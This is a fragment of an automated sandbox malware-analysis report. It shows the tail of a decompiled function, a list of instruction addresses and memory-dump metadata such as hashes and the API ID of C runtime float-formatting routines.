                                                                                                                                                                                                    								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                    						return _t26;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}






                                                                                                                                                                                                    0x004134e0
                                                                                                                                                                                                    0x004134e6
                                                                                                                                                                                                    0x00413559
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004134ed
                                                                                                                                                                                                    0x004134ed
                                                                                                                                                                                                    0x004134f0
                                                                                                                                                                                                    0x0041350b
                                                                                                                                                                                                    0x0041350e
                                                                                                                                                                                                    0x0041352e
                                                                                                                                                                                                    0x00413540
                                                                                                                                                                                                    0x00413510
                                                                                                                                                                                                    0x00413510
                                                                                                                                                                                                    0x00413513
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00413515
                                                                                                                                                                                                    0x00413527
                                                                                                                                                                                                    0x00413527
                                                                                                                                                                                                    0x00413513
                                                                                                                                                                                                    0x0041355e
                                                                                                                                                                                                    0x00413562
                                                                                                                                                                                                    0x004134f2
                                                                                                                                                                                                    0x0041350a
                                                                                                                                                                                                    0x0041350a
                                                                                                                                                                                                    0x004134f0

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000A.00000002.362596440.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_caQi43qE17.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3016257755-0
                                                                                                                                                                                                    • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                    • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%